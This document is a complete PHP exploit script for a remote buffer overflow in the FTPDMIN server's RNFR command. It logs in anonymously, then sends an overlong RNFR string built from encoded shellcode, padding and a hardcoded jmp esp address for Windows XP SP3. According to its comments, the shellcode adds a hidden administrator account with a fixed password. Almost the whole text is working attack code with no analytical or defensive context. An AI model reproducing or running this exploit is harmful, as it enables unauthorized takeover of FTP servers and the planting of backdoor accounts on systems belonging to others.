FTPDMIN RNFR命令远程溢出漏洞

<?php error_reporting(7); $ftp_server = "192.168.0.1"; $ftp_user = "anonymous"; $ftp_pass = "anon@email.com"; function ftp_cmd($cmd){ global $conn_id; echo "-> ".$cmd."\n"; $buff=ftp_raw($conn_id,$cmd); } #WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds #a "surfista" admin user with pass "pass" #contains hardcoded address, re-encode command: #alpha2 esp < shdmp.txt $____scode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI". "Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5". "prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN". "w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw". "4gPqcpupr3VQybSrTE1kOA"; #do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space $____code ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI". "NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA"; if (strlen($____scode) > 272) {die("[!] shellcode too large!");} $conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server"); if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) { echo "(*) Connected as $ftp_user@$ftp_server\n"; } else { die("(!) Unable to connect as $ftp_user\n"); } $____jnk = str_repeat("\x66",272 - strlen($____scode)); $____eip="\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3 $____jnk_ii = str_repeat("\x66",119 - strlen($____code)); $____bof=$____scode.$____jnk.$____eip.$____code.$____jnk_ii; $____boom="RNFR ".str_repeat("x",0x0096); ftp_cmd($____boom); $____boom="RNFR ".$____bof; ftp_cmd($____boom); $____boom="RNFR ".str_repeat("x",0x0208); ftp_cmd($____boom); ftp_close($conn_id); echo "(*) Done !\n"; ?>